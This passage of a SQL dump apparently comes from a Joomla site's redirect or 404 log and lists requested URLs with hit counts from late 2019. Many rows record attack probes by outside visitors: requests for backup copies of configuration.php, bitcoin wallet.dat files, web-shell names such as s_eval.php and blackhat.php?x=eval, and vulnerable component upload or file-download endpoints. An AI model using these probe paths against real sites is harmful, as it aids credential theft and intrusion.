00:00:00',301),(23496,'http://www.3s-technologies.com.tr/tr/using-joomla/extensions/components/content-component/article-category-blog?id=17&language=tr-tr',NULL,'','',21,0,'2019-10-31 04:55:06','0000-00-00 00:00:00',301),(23497,'http://3s-technologies.com.tr/tr/modules/mod_ariimageslidersa/license.txt',NULL,'http://3s-technologies.com.tr/tr/modules/mod_ariimageslidersa/license.txt','',1,0,'2019-10-31 06:41:42','0000-00-00 00:00:00',301),(23498,'http://3s-technologies.com.tr/en/modules/mod_ariimageslidersa/license.txt',NULL,'http://3s-technologies.com.tr/modules/mod_ariimageslidersa/license.txt','',1,0,'2019-10-31 10:15:11','0000-00-00 00:00:00',301),(23499,'http://3s-technologies.com.tr/en/configuration.php~',NULL,'','',1,0,'2019-10-31 18:02:49','0000-00-00 00:00:00',301),(23500,'http://3s-technologies.com.tr/tr/administrator/manifests/files/joomla.xml',NULL,'','',3,0,'2019-10-31 19:04:41','0000-00-00 00:00:00',301),(23501,'http://3s-technologies.com.tr/tr/wp-bb.php?up2018info=1',NULL,'','',1,0,'2019-11-01 04:57:27','0000-00-00 00:00:00',301),(23502,'http://3s-technologies.com.tr/tr/wp-aa.php?up2018info=1',NULL,'','',1,0,'2019-11-01 22:50:00','0000-00-00 00:00:00',301),(23503,'http://3s-technologies.com.tr/en/configuration.php.bak',NULL,'','',1,0,'2019-11-01 23:28:36','0000-00-00 00:00:00',301),(23504,'http://3s-technologies.com.tr/accesson.php',NULL,'','',3,0,'2019-11-02 16:39:34','0000-00-00 00:00:00',301),(23505,'http://3s-technologies.com.tr/en/configuration.php.save',NULL,'','',1,0,'2019-11-03 03:47:03','0000-00-00 00:00:00',301),(23506,'http://www.3s-technologies.com.tr/tr/eguqbzgjvdoivg.html',NULL,'','',1,0,'2019-11-03 12:20:30','0000-00-00 00:00:00',301),(23507,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/image-gallery/scenery/34-pinnacles',NULL,'','',1,0,'2019-11-04 02:54:46','0000-00-00 00:00:00',301),(23508,'http://3s-technologies.com.tr/en/.configuration.php.swp',NULL,'','',1,0,'2019-11-04 07:53:16','0000-00-00 00:00:00',301),(23509,'http://3s-technologies.com.tr/tr/grptraxk.html',NULL,'','',1,0,'2019-11-04 10:43:18','0000-00-00 00:00:00',301),(23510,'http://3s-technologies.com.tr/en/configuration.php.save.1',NULL,'','',1,0,'2019-11-05 11:46:07','0000-00-00 00:00:00',301),(23511,'http://www.3s-technologies.com.tr/tr/pcb-prototip-prototyping/pcb-yã¼kseklik-self-levelling',NULL,'','',9,0,'2019-11-05 13:32:22','0000-00-00 00:00:00',301),(23512,'http://www.3s-technologies.com.tr/tr/pcb-prototip-prototyping/pcb-kazä±ma-milling',NULL,'','',16,0,'2019-11-05 13:32:52','0000-00-00 00:00:00',301),(23513,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/tr/ürünler/2-el-makineler/by,mf_name/index.php?option=com_jdownloads&itemid=0&view=upload',NULL,'','',2,0,'2019-11-05 14:37:43','0000-00-00 00:00:00',301),(23514,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/tr/ürünler/2-el-makineler/by,mf_name/index.php?option=com_myblog&task=ajaxupload',NULL,'','',1,0,'2019-11-05 14:37:46','0000-00-00 00:00:00',301),(23515,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/tr/ürünler/2-el-makineler/by,mf_name/index.php?option=com_adsmanager&task=upload&tmpl=component',NULL,'','',2,0,'2019-11-05 14:37:47','0000-00-00 00:00:00',301),(23516,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/tr/ürünler/2-el-makineler/by,mf_name/index.php?option=com_cckjseblod&task=download&file=configuration.php',NULL,'','',1,0,'2019-11-05 14:37:48','0000-00-00 00:00:00',301),(23517,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/tr/ürünler/2-el-makineler/by,mf_name/index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=',NULL,'','',1,0,'2019-11-05 14:37:49','0000-00-00 00:00:00',301),(23518,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/tr/ürünler/2-el-makineler/by,mf_name/index.php?option=com_joomanager&controller=details&task=download&path=configuration.php',NULL,'','',1,0,'2019-11-05 14:37:51','0000-00-00 00:00:00',301),(23519,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/tr/ürünler/2-el-makineler/by,mf_name/administrator/index.php',NULL,'','',5,0,'2019-11-05 14:37:58','0000-00-00 00:00:00',301),(23520,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/tr/ürünler/manufacturer/tolo/dalga-lehim/by,product_name/results,1-5?language=tr-tr&keyword=/index.php?option=com_jdownloads&itemid=0&view=upload',NULL,'','',2,0,'2019-11-05 17:59:15','0000-00-00 00:00:00',301),(23521,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/tr/ürünler/manufacturer/tolo/dalga-lehim/by,product_name/results,1-5?language=tr-tr&keyword=/index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=',NULL,'','',1,0,'2019-11-05 17:59:31','0000-00-00 00:00:00',301),(23522,'http://3s-technologies.com.tr/tr//configuration.php',NULL,'http://3s-technologies.com.tr/tr//configuration.php','',2,0,'2019-11-06 10:12:04','0000-00-00 00:00:00',301),(23523,'http://3s-technologies.com.tr/tr//configuration.php',NULL,'http://3s-technologies.com.tr/tr//configuration.php','',1,0,'2019-11-06 10:12:04','0000-00-00 00:00:00',301),(23524,'http://3s-technologies.com.tr/en/.configuration.php.swo',NULL,'','',1,0,'2019-11-06 15:24:43','0000-00-00 00:00:00',301),(23525,'http://3s-technologies.com.tr/tr/wallet',NULL,'','',4,0,'2019-11-06 23:01:57','0000-00-00 00:00:00',301),(23526,'http://3s-technologies.com.tr/tr/temp/bitcoin/wallet.dat',NULL,'','',4,0,'2019-11-06 23:03:05','0000-00-00 00:00:00',301),(23527,'http://3s-technologies.com.tr/tr/temp/wallet.dat',NULL,'','',4,0,'2019-11-06 23:03:24','0000-00-00 00:00:00',301),(23528,'http://3s-technologies.com.tr/tr/backup/bitcoin',NULL,'','',4,0,'2019-11-06 23:03:43','0000-00-00 00:00:00',301),(23529,'http://3s-technologies.com.tr/tr/bitcoin',NULL,'','',4,0,'2019-11-06 23:07:13','0000-00-00 00:00:00',301),(23530,'http://3s-technologies.com.tr/tr/bitcoin/backup/wallet.dat',NULL,'','',8,0,'2019-11-06 23:09:41','0000-00-00 00:00:00',301),(23531,'http://3s-technologies.com.tr/tr/backup/bitcoin/wallet.dat',NULL,'','',8,0,'2019-11-06 23:15:28','0000-00-00 00:00:00',301),(23532,'http://3s-technologies.com.tr/tr/.bitcoin/wallet.dat',NULL,'','',4,0,'2019-11-06 23:49:31','0000-00-00 00:00:00',301),(23533,'http://3s-technologies.com.tr/tr//admin',NULL,'','',50,0,'2019-11-07 00:54:22','0000-00-00 00:00:00',301),(23534,'http://3s-technologies.com.tr/tr//media/cloud.php',NULL,'','',1,0,'2019-11-07 00:54:27','0000-00-00 00:00:00',301),(23535,'http://3s-technologies.com.tr/tr//media/spy.txt',NULL,'','',1,0,'2019-11-07 00:54:28','0000-00-00 00:00:00',301),(23536,'http://3s-technologies.com.tr/tr//modules/mod_simplefileuploadv1.3/elements/mds_v3.php',NULL,'','',1,0,'2019-11-07 00:54:28','0000-00-00 00:00:00',301),(23537,'http://3s-technologies.com.tr/en/configuration.php.backup',NULL,'','',1,0,'2019-11-07 19:05:19','0000-00-00 00:00:00',301),(23538,'http://www.3s-technologies.com.tr/tr/pcb-prototip-prototyping/pcb-y',NULL,'','',2,0,'2019-11-07 23:34:42','0000-00-00 00:00:00',301),(23539,'http://www.3s-technologies.com.tr/tr/pcb-prototip-prototyping/pcb-kaz',NULL,'','',2,0,'2019-11-07 23:34:44','0000-00-00 00:00:00',301),(23540,'http://www.3s-technologies.com.tr/en/pcb-prototip-prototyping/pcb-y',NULL,'','',1,0,'2019-11-07 23:36:25','0000-00-00 00:00:00',301),(23541,'http://www.3s-technologies.com.tr/en/pcb-prototip-prototyping/pcb-kaz',NULL,'','',1,0,'2019-11-07 23:36:26','0000-00-00 00:00:00',301),(23542,'http://3s-technologies.com.tr/index.php/tr/growers',NULL,'','',3,0,'2019-11-09 01:25:22','0000-00-00 00:00:00',301),(23543,'http://3s-technologies.com.tr/index.php/tr/welcome',NULL,'','',1,0,'2019-11-09 01:30:31','0000-00-00 00:00:00',301),(23544,'http://3s-technologies.com.tr/index.php/tr/using-joomla/extensions/modules/utility-modules/syndicate',NULL,'','',1,0,'2019-11-09 01:55:43','0000-00-00 00:00:00',301),(23545,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/components/content-component/article-categories/73-park-site/photo-gallery/scenery/65-ormiston-pound',NULL,'','',7,0,'2019-11-09 05:46:23','0000-00-00 00:00:00',301),(23546,'http://3s-technologies.com.tr/en/cache/accesson1.php',NULL,'http://3s-technologies.com.tr/en/component/users?view=login','',15,0,'2019-11-09 08:48:46','0000-00-00 00:00:00',301),(23547,'http://3s-technologies.com.tr/en/accesson2.php',NULL,'http://3s-technologies.com.tr/en/','',2,0,'2019-11-10 03:56:56','0000-00-00 00:00:00',301),(23548,'https://www.3s-technologies.com.tr/tr/favicon.ico',NULL,'','',7,0,'2019-11-10 17:47:23','0000-00-00 00:00:00',301),(23549,'http://www.3s-technologies.com.tr/tr/lifxcjcgo.html',NULL,'','',1,0,'2019-11-10 18:33:42','0000-00-00 00:00:00',301),(23550,'http://3s-technologies.com.tr/en/configuration.php.save.2',NULL,'','',1,0,'2019-11-10 21:59:19','0000-00-00 00:00:00',301),(23551,'http://3s-technologies.com.tr/en//2019/wp-includes/wlwmanifest.xml',NULL,'','',69,0,'2019-11-11 03:52:05','0000-00-00 00:00:00',301),(23552,'http://3s-technologies.com.tr/tr//accesson1.php',NULL,'http://3s-technologies.com.tr/tr//accesson1.php','',1,0,'2019-11-11 15:33:47','0000-00-00 00:00:00',301),(23553,'http://3s-technologies.com.tr/tr/trakfjdrvyfguws.html',NULL,'','',1,0,'2019-11-11 19:44:43','0000-00-00 00:00:00',301),(23554,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/?itemid=429',NULL,'','',1,0,'2019-11-12 03:09:54','0000-00-00 00:00:00',301),(23555,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/using-joomla/extensions/modules/utility-modules/syndicate',NULL,'','',1,0,'2019-11-12 04:41:18','0000-00-00 00:00:00',301),(23556,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/tr/welcome',NULL,'','',1,0,'2019-11-12 04:42:08','0000-00-00 00:00:00',301),(23557,'http://3s-technologies.com.tr/tr/admin/img/version.js',NULL,'http://3s-technologies.com.tr/admin/img/version.js','',2,0,'2019-11-12 05:49:17','0000-00-00 00:00:00',301),(23558,'http://www.3s-technologies.com.tr/en/pcb-prototip-prototyping/',NULL,'','',18,0,'2019-11-13 16:18:56','0000-00-00 00:00:00',301),(23559,'http://www.3s-technologies.com.tr/tr/80-turkish-tr/',NULL,'','',17,0,'2019-11-13 16:20:31','0000-00-00 00:00:00',301),(23560,'http://www.3s-technologies.com.tr/tr/ana-sayfa/80-turkish-tr/',NULL,'','',17,0,'2019-11-13 16:20:31','0000-00-00 00:00:00',301),(23561,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/components/users-component/registration-form+()',NULL,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/components/users-component/registration-form+%28%29','',2,0,'2019-11-13 21:59:08','0000-00-00 00:00:00',301),(23562,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/image-gallery',NULL,'','',1,0,'2019-11-14 06:27:20','0000-00-00 00:00:00',301),(23563,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/image-gallery/animals',NULL,'','',1,0,'2019-11-14 06:27:40','0000-00-00 00:00:00',301),(23564,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/image-gallery/scenery',NULL,'','',1,0,'2019-11-14 06:28:00','0000-00-00 00:00:00',301),(23565,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/?itemid=243',NULL,'','',1,0,'2019-11-14 06:29:37','0000-00-00 00:00:00',301),(23566,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/directions',NULL,'','',1,0,'2019-11-14 06:31:07','0000-00-00 00:00:00',301),(23567,'http://3s-technologies.com.tr/tr/2019/wp-login.php',NULL,'http://3s-technologies.com.tr/2019/wp-login.php','',3,0,'2019-11-15 12:08:31','0000-00-00 00:00:00',301),(23568,'http://www.3s-technologies.com.tr/tr/vidgbtzqrpqueoh.html',NULL,'','',1,0,'2019-11-17 15:42:20','0000-00-00 00:00:00',301),(23569,'http://3s-technologies.com.tr/en/administrator/components/com_rokdownloads/assets/uploadhandler.php',NULL,'','',4,0,'2019-11-18 05:46:07','0000-00-00 00:00:00',301),(23570,'http://3s-technologies.com.tr/en/administrator/components/com_extplorer/uploadhandler.php',NULL,'','',4,0,'2019-11-18 05:46:09','0000-00-00 00:00:00',301),(23571,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/parks-home',NULL,'','',1,0,'2019-11-18 06:07:25','0000-00-00 00:00:00',301),(23572,'http://3s-technologies.com.tr/tr/hmplbdhu.html',NULL,'','',1,0,'2019-11-18 16:15:14','0000-00-00 00:00:00',301),(23573,'http://3s-technologies.com.tr/index.php/en/growers',NULL,'','',1,0,'2019-11-19 06:17:13','0000-00-00 00:00:00',301),(23574,'http://3s-technologies.com.tr/index.php/en/using-joomla/extensions/components/content-component/article-categories/73-park-site/photo-gallery/scenery/64-blue-mountain-rain-forest',NULL,'','',1,0,'2019-11-19 06:21:05','0000-00-00 00:00:00',301),(23575,'http://3s-technologies.com.tr/index.php/en/using-joomla/extensions/components/content-component/article-categories/73-park-site/photo-gallery/scenery/65-ormiston-pound',NULL,'','',1,0,'2019-11-19 06:21:07','0000-00-00 00:00:00',301),(23576,'https://www.3s-technologies.com.tr/tr/ã¼rã¼nler/cnc',NULL,'','',8,0,'2019-11-19 14:06:26','0000-00-00 00:00:00',301),(23577,'http://3s-technologies.com.tr/tr/sadad24',NULL,'','',4,0,'2019-11-19 15:53:37','0000-00-00 00:00:00',301),(23578,'https://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/tr/ueruenler/smd-orta-hızlı?language=tr-tr',NULL,'','',1,0,'2019-11-22 05:38:45','0000-00-00 00:00:00',301),(23579,'http://3s-technologies.com.tr/tr/desktopmodules/admin/radeditorprovider/dialoghandler.aspx',NULL,'','',6,0,'2019-11-22 09:43:09','0000-00-00 00:00:00',301),(23580,'http://www.3s-technologies.com.tr/tr/&nx=144&ny=50&clkt=27&bg=!icoliztys0buur6hggmcaaabwfiaaadhmqf8uf4fnkrtfkcp7naaxp6g8ljqvumsxpodeiayihpjyqkcirfx1q8-hqzy0ux-h15vcodlvql23s8wrnhrnwmrfhew87efiquicyxo0al0pxzlob9upatgreymre6cwgxxxiv4jmgox5liagamyzoe0ardr-t7bkxdnlm0wgbdyutrscyb8aj34oijdewvzx92bkfkpzhewtwtm_hs97qjfhsgy5n4n5vntceqw2hmgv1sm7vlkhou5no1q24lky9pt9wykzzrhgdpymi8f6uvn6qusrnnavxrizr_m5xirnrxmoes362lr1mdnxhstx28u71sgynb1gyaj2jfhut4ciqovakeiqu_5_eqquvb68jryirx3i5l-ya6rewp7dmfws-w_x1qe-y9uwdxkrpyv0zdzbpsaryn9asm2mf2ruscmprywk9zco4jdsvgkwq_g3ikqel8rv1vdpnridl4kbvitncztunq33l0yc9cchfwhh2toewwk3k1vxe',NULL,'https://www.google.com.tr/','',5,0,'2019-11-22 20:41:48','0000-00-00 00:00:00',301),(23581,'http://www.3s-technologies.com.tr/tr/&nx=144&ny=19&clkt=32&bg=!nj-ln4dywsmoswkzxfqcaaabfliaaab8mqgjkvvnnw_gexn00jhgaaxa3gd4yxp2ja82mrgq5b7omfyr8hulzd7tyvmkmmra8zm2v9j4a80sd88jdfaojipntkz-fuxtsza4ifjivceshmpbn0lpgu_oqq567jlacedapujgrp14nnjym2t7yuxwpuofdqlri4r495e0vhkqrcztlwl20yltlc7pul8be2kfqp7g8p6xugrqddncgpgsl387x1fx2nwipgub6m5a9n-i-6q5x8qpxwqttrql18jb4ocphqbmpildreuwnl_fmqerrniox6xosasru4uxrr0y3qbbs9_smq_-b9yawjzdjwfoyzvqffot7x1nwztgpayxx6uh-mj6u5x2ffwa4kmfwmbyafekvl_ggtqegmysymsan94e_rfnh2qc34nxotpgaqr527-xt-hqmqko_u3qbfbptl6woaax-xce9d_pzp8x4eiqcr7fmz6vdaj1k_yeogp1cxbe8m28wwdokymxoy5gedzgdvjbzhxryczamljqyhnfqupo',NULL,'https://www.google.com/','',1,0,'2019-11-23 16:42:49','0000-00-00 00:00:00',301),(23582,'http://www.3s-technologies.com.tr/tr/&nx=148&ny=28&clkt=25&bg=!qkulq7nywsmoswkzxfqcaaabfliaaacmmqgjkvvnnw_gexn00jhgaaxa3gd4yxp2ja82mrgq5b7omfyr8hulzd7tyvmkmmra8zm2v9j4a80sd88jdfaojipntkz-fuxtsza4ifjivceshmpbn0lpgu_oqq567jlacedapujgrp14nnjym2t7yuxwpuofdqlri4r495e0vhkqrcztlwl20yltlc7pul8be2kfqp7g8p6xugrqddncgpgsl387x1fx2nwipgub6m5a9n-i-6q5x8qpxwqttrql18jb4ocphqbmpildreuwnl_fmqerrniox6xosasru4uxrr0y3qbbs9_smq_-b9yawjzdjwfoyzvqffot7x1nwztgpayxx6uh-mj6u5x2ffwa4kmfwmbyafekvl_ggtqegmysymsan94e_rfnh2qc34nxotpgaqr529oxt-hqmweqmswmbp0hyaq5njzybxx-zgajcmlgucsbm_2dw3xcncxpvd5q268khup86ora9b7mkrpalwrkgatyv0pj5zvakguhgsrqlogjjinl',NULL,'https://www.google.com/','',1,0,'2019-11-23 16:42:56','0000-00-00 00:00:00',301),(23583,'http://www.3s-technologies.com.tr/tr/using-joomla/extensions/components/content-component/article-category-blog?id=18&language=tr-tr',NULL,'','',14,0,'2019-11-24 10:11:23','0000-00-00 00:00:00',301),(23584,'http://www.3s-technologies.com.tr/tr/ngoqvnoztdfr.html',NULL,'','',1,0,'2019-11-24 20:40:43','0000-00-00 00:00:00',301),(23585,'http://www.3s-technologies.com.tr/tr/&nx=239&ny=12&clkt=31&bg=!p6slplxy6tzmca0ssxacaaab21iaaacjmqgjygc9w3ynqoapecy1vp30ltc8hhyis7xvzlknhogbslkz17gnw_emzbzujgbkwxvewj-3lfhe6xiviu8lf-ssjv1lk_bx4io6oijeoskjo45ymllxxxh4rryedpfuobhtnqz1hf9ssjvblum7ds62v6k174sbjhu8g07bjjb6dcbw7flm7cx8dkg8fvx39gfuqo95cnqjiabelcuhrrqzamo_iho0fahofr7zhnwhd6jdbul7huicbddumhkp6k4p74eeunnaowbmmmermvfqkbr7u9rtcvmuypt2664s2zstykljq7utgu4qmmau-3atth9xe_lgjsztfv_wqcnpd95orzbk4efvvxlv78aulkor7jcstkvbjawo1zvidvtockztgwm3cp5dxnuha3nu66alvjyxuv1pzhoxicdydeotdntrshlp9vvyj-7vmt_if6o7duh54mugwk-ruz_sfaudwl7pgtbpdt31y7ceo5dzoppomnzbkrtx1tpyvrh_ews26ad7qzc7',NULL,'https://www.google.com/','',1,0,'2019-11-24 20:54:49','0000-00-00 00:00:00',301),(23586,'https://3s-technologies.com.tr/tr/owa/auth/logon.aspx?replacecurrent=1&url=',NULL,'','',5,0,'2019-11-24 21:45:14','0000-00-00 00:00:00',301),(23587,'http://3s-technologies.com.tr/tr/owa/auth/logon.aspx?replacecurrent=1&url=',NULL,'','',7,0,'2019-11-24 21:45:25','0000-00-00 00:00:00',301),(23588,'http://3s-technologies.com.tr/tr/ibanazfd.html',NULL,'','',1,0,'2019-11-27 05:34:59','0000-00-00 00:00:00',301),(23589,'https://www.3s-technologies.com.tr/tr/components/com_virtuemart/assets/css/chosen-sprite@2x.png',NULL,'https://www.3s-technologies.com.tr/components/com_virtuemart/assets/css/chosen.css?vmver=3b3e5b06','',1117,0,'2019-11-28 16:14:02','0000-00-00 00:00:00',301),(23590,'https://www.3s-technologies.com.tr/en/components/com_virtuemart/assets/css/chosen-sprite@2x.png',NULL,'https://www.3s-technologies.com.tr/components/com_virtuemart/assets/css/chosen.css?vmver=3b3e5b06','',3,0,'2019-11-28 16:15:27','0000-00-00 00:00:00',301),(23591,'http://3s-technologies.com.tr/index.php/en/directions',NULL,'','',1,0,'2019-11-30 12:37:54','0000-00-00 00:00:00',301),(23592,'http://3s-technologies.com.tr/tr//administrator/',NULL,'http://3s-technologies.com.tr/tr//administrator/','',15,0,'2019-11-30 15:30:05','0000-00-00 00:00:00',301),(23593,'https://3s-technologies.com.tr/tr/3s-technologies.com.tr/en/contacts',NULL,'https://3s-technologies.com.tr/tr/3s-technologies.com.tr/en/contacts','',2,0,'2019-12-01 22:25:22','0000-00-00 00:00:00',301),(23594,'http://www.3s-technologies.com.tr/tr/gijcfoxs.html',NULL,'','',1,0,'2019-12-02 01:56:41','0000-00-00 00:00:00',301),(23595,'http://3s-technologies.com.tr/tr/skdbaywpp.html',NULL,'','',1,0,'2019-12-03 13:07:06','0000-00-00 00:00:00',301),(23596,'http://3s-technologies.com.tr/assets/images/s_noeval.php',NULL,'','',8,0,'2019-12-03 13:50:49','0000-00-00 00:00:00',301),(23597,'http://3s-technologies.com.tr/s_noeval.php',NULL,'','',3,0,'2019-12-03 17:01:07','0000-00-00 00:00:00',301),(23598,'http://3s-technologies.com.tr/tr/assets/images/new_license.php',NULL,'','',2,0,'2019-12-03 18:33:10','0000-00-00 00:00:00',301),(23599,'http://3s-technologies.com.tr/en/?option=com_content&view=article&id=45&itemid=29',NULL,'','',7,0,'2019-12-03 21:19:33','0000-00-00 00:00:00',301),(23600,'http://3s-technologies.com.tr/components/com_jce/editor/tiny_mce/plugins/imgmanager_ext/classes/image/imagick.php',NULL,'','',3,0,'2019-12-03 22:08:22','0000-00-00 00:00:00',301),(23601,'http://3s-technologies.com.tr/connectors/resource/s_eval.php',NULL,'','',6,0,'2019-12-03 22:35:44','0000-00-00 00:00:00',301),(23602,'http://3s-technologies.com.tr/s_eval.php',NULL,'','',4,0,'2019-12-03 23:38:34','0000-00-00 00:00:00',301),(23603,'http://3s-technologies.com.tr/blackhat.php?x=eval',NULL,'','',1,0,'2019-12-04 00:37:15','0000-00-00 00:00:00',301),(23604,'http://3s-technologies.com.tr/assets/images/blackhat.php?x=eval',NULL,'','',3,0,'2019-12-04 00:38:09','0000-00-00 00:00:00',301),(23605,'http://3s-technologies.com.tr/cache/s_eval.php',NULL,'','',3,0,'2019-12-04 02:53:46','0000-00-00 00:00:00',301),(23606,'http://3s-technologies.com.tr/cache/s_noeval.php',NULL,'','',4,0,'2019-12-04 03:48:29','0000-00-00 00:00:00',301),(23607,'http://3s-technologies.com.tr/tr/assets/images/wp-console.php',NULL,'','',3,0,'2019-12-04 04:07:58','0000-00-00 00:00:00',301),(23608,'http://3s-technologies.com.tr/assets/images/s_eval.php',NULL,'','',7,0,'2019-12-04 06:20:33','0000-00-00 00:00:00',301),(23609,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=article&id=64&itemid=86&lang=tr',NULL,'','',7,0,'2019-12-04 12:45:57','0000-00-00 00:00:00',301),(23610,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=64:flux&catid=39:lehimleme&itemid=86&lang=tr',NULL,'','',12,0,'2019-12-04 15:27:35','0000-00-00 00:00:00',301),(23611,'http://3s-technologies.com.tr/tr/xsamxadoo_157548145.php',NULL,'','',2,0,'2019-12-04 20:38:12','0000-00-00 00:00:00',301),(23612,'http://3s-technologies.com.tr/tr/modules/mod_simplefileuploadv1.3/elements/xsam_xadoo_bot.php',NULL,'','',2,0,'2019-12-04 21:43:21','0000-00-00 00:00:00',301),(23613,'http://www.3s-technologies.com.tr/en/joomla/index.php',NULL,'','',1,0,'2019-12-05 13:50:29','0000-00-00 00:00:00',301),(23614,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/directions',NULL,'','',1,0,'2019-12-05 22:48:28','0000-00-00 00:00:00',301),(23615,'http://3s-technologies.com.tr:80/tr/configuration.php.save',NULL,'http://3s-technologies.com.tr:80/configuration.php.save','',1,0,'2019-12-05 23:45:41','0000-00-00 00:00:00',301),(23616,'http://3s-technologies.com.tr:80/tr/configuration.txt',NULL,'http://3s-technologies.com.tr:80/configuration.txt','',2,0,'2019-12-05 23:50:18','0000-00-00 00:00:00',301),(23617,'http://3s-technologies.com.tr:80/tr/configuration.1',NULL,'http://3s-technologies.com.tr:80/configuration.1','',1,0,'2019-12-05 23:52:46','0000-00-00 00:00:00',301),(23618,'http://3s-technologies.com.tr:80/tr/configuration.php~',NULL,'http://3s-technologies.com.tr:80/configuration.php~','',2,0,'2019-12-05 23:54:03','0000-00-00 00:00:00',301),(23619,'http://3s-technologies.com.tr:80/tr/configuration.bak',NULL,'http://3s-technologies.com.tr:80/configuration.bak','',2,0,'2019-12-05 23:54:58','0000-00-00 00:00:00',301),(23620,'http://3s-technologies.com.tr:80/tr/configuration.',NULL,'http://3s-technologies.com.tr:80/configuration.','',1,0,'2019-12-05 23:55:24','0000-00-00 00:00:00',301),(23621,'http://3s-technologies.com.tr:80/tr/configuration.ph',NULL,'http://3s-technologies.com.tr:80/configuration.ph','',1,0,'2019-12-05 23:56:58','0000-00-00 00:00:00',301),(23622,'http://3s-technologies.com.tr:80/tr/configuration.php.',NULL,'http://3s-technologies.com.tr:80/configuration.php.','',1,0,'2019-12-05 23:57:36','0000-00-00 00:00:00',301),(23623,'http://3s-technologies.com.tr:80/tr/configuration.php.php',NULL,'http://3s-technologies.com.tr:80/configuration.php.php','',1,0,'2019-12-05 23:58:10','0000-00-00 00:00:00',301),(23624,'http://3s-technologies.com.tr:80/tr/configuration.res',NULL,'http://3s-technologies.com.tr:80/configuration.res','',1,0,'2019-12-05 23:58:48','0000-00-00 00:00:00',301),(23625,'http://3s-technologies.com.tr:80/tr/.configuration.php',NULL,'http://3s-technologies.com.tr:80/.configuration.php','',1,0,'2019-12-05 23:59:38','0000-00-00 00:00:00',301),(23626,'http://3s-technologies.com.tr:80/tr/!configuration.php',NULL,'http://3s-technologies.com.tr:80/!configuration.php','',1,0,'2019-12-06 00:00:38','0000-00-00 00:00:00',301),(23627,'http://3s-technologies.com.tr:80/tr/configuration!',NULL,'http://3s-technologies.com.tr:80/configuration!','',1,0,'2019-12-06 00:01:26','0000-00-00 00:00:00',301),(23628,'http://3s-technologies.com.tr:80/tr/@configuration.php',NULL,'http://3s-technologies.com.tr:80/@configuration.php','',1,0,'2019-12-06 00:02:50','0000-00-00 00:00:00',301),(23629,'http://3s-technologies.com.tr:80/tr/configuration.php.res',NULL,'http://3s-technologies.com.tr:80/configuration.php.res','',1,0,'2019-12-06 00:05:00','0000-00-00 00:00:00',301),(23630,'http://3s-technologies.com.tr:80/tr/configuration.php.bakup',NULL,'http://3s-technologies.com.tr:80/configuration.php.bakup','',1,0,'2019-12-06 00:05:17','0000-00-00 00:00:00',301),(23631,'http://3s-technologies.com.tr:80/tr/configuration.php.new~',NULL,'http://3s-technologies.com.tr:80/configuration.php.new~','',1,0,'2019-12-06 01:48:52','0000-00-00 00:00:00',301),(23632,'http://3s-technologies.com.tr:80/tr/configuration.php.old',NULL,'http://3s-technologies.com.tr:80/configuration.php.old','',1,0,'2019-12-06 01:50:04','0000-00-00 00:00:00',301),(23633,'http://3s-technologies.com.tr:80/tr/configuration.php.old~',NULL,'http://3s-technologies.com.tr:80/configuration.php.old~','',1,0,'2019-12-06 01:50:09','0000-00-00 00:00:00',301),(23634,'http://3s-technologies.com.tr:80/tr/configuration.php.bak',NULL,'http://3s-technologies.com.tr:80/configuration.php.bak','',1,0,'2019-12-06 01:51:09','0000-00-00 00:00:00',301),(23635,'http://3s-technologies.com.tr:80/tr/configuration.php.bkp',NULL,'http://3s-technologies.com.tr:80/configuration.php.bkp','',1,0,'2019-12-06 01:51:59','0000-00-00 00:00:00',301),(23636,'http://3s-technologies.com.tr:80/tr/configuration.php.txt',NULL,'http://3s-technologies.com.tr:80/configuration.php.txt','',1,0,'2019-12-06 01:53:17','0000-00-00 00:00:00',301),(23637,'http://3s-technologies.com.tr:80/tr/configuration - copy.php',NULL,'http://3s-technologies.com.tr:80/configuration%20-%20Copy.php','',1,0,'2019-12-06 01:54:16','0000-00-00 00:00:00',301),(23638,'http://3s-technologies.com.tr:80/tr/configuration.php.swo',NULL,'http://3s-technologies.com.tr:80/configuration.php.swo','',1,0,'2019-12-06 01:54:58','0000-00-00 00:00:00',301),(23639,'http://3s-technologies.com.tr:80/tr/configuration.php_bak',NULL,'http://3s-technologies.com.tr:80/configuration.php_bak','',1,0,'2019-12-06 01:55:21','0000-00-00 00:00:00',301),(23640,'http://3s-technologies.com.tr:80/tr/configuration.orig',NULL,'http://3s-technologies.com.tr:80/configuration.orig','',1,0,'2019-12-06 01:56:40','0000-00-00 00:00:00',301),(23641,'http://3s-technologies.com.tr:80/tr/configuration.php.original',NULL,'http://3s-technologies.com.tr:80/configuration.php.original','',1,0,'2019-12-06 01:57:49','0000-00-00 00:00:00',301),(23642,'http://3s-technologies.com.tr:80/tr/configuration.php.swp',NULL,'http://3s-technologies.com.tr:80/configuration.php.swp','',1,0,'2019-12-06 01:58:23','0000-00-00 00:00:00',301),(23643,'http://3s-technologies.com.tr:80/tr/configuration.save',NULL,'http://3s-technologies.com.tr:80/configuration.save','',1,0,'2019-12-06 01:59:14','0000-00-00 